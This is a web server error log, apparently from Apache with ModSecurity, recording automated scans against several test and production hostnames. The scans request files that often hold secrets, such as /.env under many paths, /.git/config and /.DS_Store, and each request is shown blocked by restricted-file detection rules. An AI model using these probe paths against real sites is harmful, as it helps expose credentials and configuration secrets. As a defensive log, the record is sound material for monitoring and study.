[Fri Nov 28 10:26:29.741655 2025] [:error] [pid 381109] [client 54.67.124.117:53466] [client 54.67.124.117] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/uploads/.env"] [unique_id "aSlqxehaa_ABFroPvQ_ciwAAABY"]
[Fri Nov 28 10:26:29.741862 2025] [:error] [pid 381109] [client 54.67.124.117:53466] [client 54.67.124.117] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/uploads/.env"] [unique_id "aSlqxehaa_ABFroPvQ_ciwAAABY"]
[Fri Nov 28 10:26:30.188446 2025] [:error] [pid 381109] [client 54.67.124.117:53466] [client 54.67.124.117] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.remote"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.remote"] [unique_id "aSlqxuhaa_ABFroPvQ_cjAAAABY"]
[Fri Nov 28 10:26:30.188685 2025] [:error] [pid 381109] [client 54.67.124.117:53466] [client 54.67.124.117] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.remote"] [unique_id "aSlqxuhaa_ABFroPvQ_cjAAAABY"]
[Fri Nov 28 10:26:30.188914 2025] [:error] [pid 381109] [client 54.67.124.117:53466] [client 54.67.124.117] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.remote"] [unique_id "aSlqxuhaa_ABFroPvQ_cjAAAABY"]
[Fri Nov 28 10:26:30.552846 2025] [:error] [pid 376662] [client 54.67.124.117:53560] [client 54.67.124.117] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /cronlab/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/cronlab/.env"] [unique_id "aSlqxq9uJDTeYEJvuJMKHwAAAAU"]
[Fri Nov 28 10:26:30.553068 2025] [:error] [pid 376662] [client 54.67.124.117:53560] [client 54.67.124.117] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/cronlab/.env"] [unique_id "aSlqxq9uJDTeYEJvuJMKHwAAAAU"]
[Fri Nov 28 10:26:30.553254 2025] [:error] [pid 376662] [client 54.67.124.117:53560] [client 54.67.124.117] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/cronlab/.env"] [unique_id "aSlqxq9uJDTeYEJvuJMKHwAAAAU"]
[Fri Nov 28 10:26:30.912651 2025] [:error] [pid 376662] [client 54.67.124.117:53560] [client 54.67.124.117] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /saas/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/saas/.env"] [unique_id "aSlqxq9uJDTeYEJvuJMKIAAAAAU"]
[Fri Nov 28 10:26:30.912973 2025] [:error] [pid 376662] [client 54.67.124.117:53560] [client 54.67.124.117] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/saas/.env"] [unique_id "aSlqxq9uJDTeYEJvuJMKIAAAAAU"]
[Fri Nov 28 10:26:30.913195 2025] [:error] [pid 376662] [client 54.67.124.117:53560] [client 54.67.124.117] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/saas/.env"] [unique_id "aSlqxq9uJDTeYEJvuJMKIAAAAAU"]
[Fri Nov 28 10:26:31.328737 2025] [:error] [pid 381109] [client 54.67.124.117:53466] [client 54.67.124.117] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /en/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/en/.env"] [unique_id "aSlqx-haa_ABFroPvQ_cjQAAABY"]
[Fri Nov 28 10:26:31.328989 2025] [:error] [pid 381109] [client 54.67.124.117:53466] [client 54.67.124.117] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/en/.env"] [unique_id "aSlqx-haa_ABFroPvQ_cjQAAABY"]
[Fri Nov 28 10:26:31.329713 2025] [:error] [pid 381109] [client 54.67.124.117:53466] [client 54.67.124.117] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/en/.env"] [unique_id "aSlqx-haa_ABFroPvQ_cjQAAABY"]
[Fri Nov 28 10:26:31.825050 2025] [:error] [pid 381109] [client 54.67.124.117:53466] [client 54.67.124.117] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /core/datavase/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/core/Datavase/.env"] [unique_id "aSlqx-haa_ABFroPvQ_cjgAAABY"]
[Fri Nov 28 10:26:31.825274 2025] [:error] [pid 381109] [client 54.67.124.117:53466] [client 54.67.124.117] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/core/Datavase/.env"] [unique_id "aSlqx-haa_ABFroPvQ_cjgAAABY"]
[Fri Nov 28 10:26:31.825484 2025] [:error] [pid 381109] [client 54.67.124.117:53466] [client 54.67.124.117] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/core/Datavase/.env"] [unique_id "aSlqx-haa_ABFroPvQ_cjgAAABY"]
[Fri Nov 28 10:26:31.829273 2025] [:error] [pid 376662] [client 54.67.124.117:53560] [client 54.67.124.117] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aSlqx69uJDTeYEJvuJMKIQAAAAU"]
[Fri Nov 28 10:26:31.829483 2025] [:error] [pid 376662] [client 54.67.124.117:53560] [client 54.67.124.117] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aSlqx69uJDTeYEJvuJMKIQAAAAU"]
[Fri Nov 28 10:26:31.829660 2025] [:error] [pid 376662] [client 54.67.124.117:53560] [client 54.67.124.117] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aSlqx69uJDTeYEJvuJMKIQAAAAU"]
[Fri Nov 28 10:26:31.833108 2025] [:error] [pid 383650] [client 54.67.124.117:53776] [client 54.67.124.117] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /public/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/public/.env"] [unique_id "aSlqx8VfhQ6AWz1P1NuqMwAAAAA"]
[Fri Nov 28 10:26:31.833327 2025] [:error] [pid 383650] [client 54.67.124.117:53776] [client 54.67.124.117] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/public/.env"] [unique_id "aSlqx8VfhQ6AWz1P1NuqMwAAAAA"]
[Fri Nov 28 10:26:31.833488 2025] [:error] [pid 383650] [client 54.67.124.117:53776] [client 54.67.124.117] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/public/.env"] [unique_id "aSlqx8VfhQ6AWz1P1NuqMwAAAAA"]
[Fri Nov 28 10:26:32.702584 2025] [:error] [pid 383656] [client 54.67.124.117:55990] [client 54.67.124.117] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /sitemaps/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/sitemaps/.env"] [unique_id "aSlqyGqcx_Hq63FLUS4KqgAAAAs"]
[Fri Nov 28 10:26:32.702869 2025] [:error] [pid 383656] [client 54.67.124.117:55990] [client 54.67.124.117] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/sitemaps/.env"] [unique_id "aSlqyGqcx_Hq63FLUS4KqgAAAAs"]
[Fri Nov 28 10:26:32.703065 2025] [:error] [pid 383656] [client 54.67.124.117:55990] [client 54.67.124.117] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/sitemaps/.env"] [unique_id "aSlqyGqcx_Hq63FLUS4KqgAAAAs"]
[Fri Nov 28 10:57:01.203706 2025] [authz_core:error] [pid 381109] [client 146.190.63.48:56716] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/server-status
[Fri Nov 28 10:57:02.776250 2025] [:error] [pid 384065] [client 146.190.63.48:56736] [client 146.190.63.48] ModSecurity: Warning. Matched phrase "/.DS_Store" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.DS_Store found within REQUEST_FILENAME: /.ds_store"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aSlx7mNJq6bc-fJ7GQN8lQAAAAA"]
[Fri Nov 28 10:57:02.776507 2025] [:error] [pid 384065] [client 146.190.63.48:56736] [client 146.190.63.48] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aSlx7mNJq6bc-fJ7GQN8lQAAAAA"]
[Fri Nov 28 10:57:02.776703 2025] [:error] [pid 384065] [client 146.190.63.48:56736] [client 146.190.63.48] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aSlx7mNJq6bc-fJ7GQN8lQAAAAA"]
[Fri Nov 28 10:57:03.275412 2025] [:error] [pid 384066] [client 146.190.63.48:56738] [client 146.190.63.48] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aSlx73kY7uSOKjkHHjTx1QAAAAM"]
[Fri Nov 28 10:57:03.275673 2025] [:error] [pid 384066] [client 146.190.63.48:56738] [client 146.190.63.48] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aSlx73kY7uSOKjkHHjTx1QAAAAM"]
[Fri Nov 28 10:57:03.275846 2025] [:error] [pid 384066] [client 146.190.63.48:56738] [client 146.190.63.48] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aSlx73kY7uSOKjkHHjTx1QAAAAM"]
[Fri Nov 28 10:57:03.772650 2025] [:error] [pid 384067] [client 146.190.63.48:56748] [client 146.190.63.48] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aSlx791sP_DH5i5fGun4WAAAAAQ"]
[Fri Nov 28 10:57:03.772885 2025] [:error] [pid 384067] [client 146.190.63.48:56748] [client 146.190.63.48] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aSlx791sP_DH5i5fGun4WAAAAAQ"]
[Fri Nov 28 10:57:03.773045 2025] [:error] [pid 384067] [client 146.190.63.48:56748] [client 146.190.63.48] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aSlx791sP_DH5i5fGun4WAAAAAQ"]
[Fri Nov 28 12:49:31.062766 2025] [authz_core:error] [pid 385208] [client 209.97.180.8:47554] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/server-status
[Fri Nov 28 12:49:31.393855 2025] [:error] [pid 384077] [client 209.97.180.8:47578] [client 209.97.180.8] ModSecurity: Warning. Matched phrase "/.DS_Store" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.DS_Store found within REQUEST_FILENAME: /.ds_store"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.DS_Store"] [unique_id "aSmMS5Dbtqpg1ipAjoI4agAAAA8"]
[Fri Nov 28 12:49:31.394213 2025] [:error] [pid 384077] [client 209.97.180.8:47578] [client 209.97.180.8] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.DS_Store"] [unique_id "aSmMS5Dbtqpg1ipAjoI4agAAAA8"]
[Fri Nov 28 12:49:31.394521 2025] [:error] [pid 384077] [client 209.97.180.8:47578] [client 209.97.180.8] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.DS_Store"] [unique_id "aSmMS5Dbtqpg1ipAjoI4agAAAA8"]
[Fri Nov 28 12:49:31.491260 2025] [:error] [pid 385204] [client 209.97.180.8:47584] [client 209.97.180.8] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aSmMS4JthrrJ55oRwz6kCQAAAAI"]
[Fri Nov 28 12:49:31.491494 2025] [:error] [pid 385204] [client 209.97.180.8:47584] [client 209.97.180.8] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aSmMS4JthrrJ55oRwz6kCQAAAAI"]
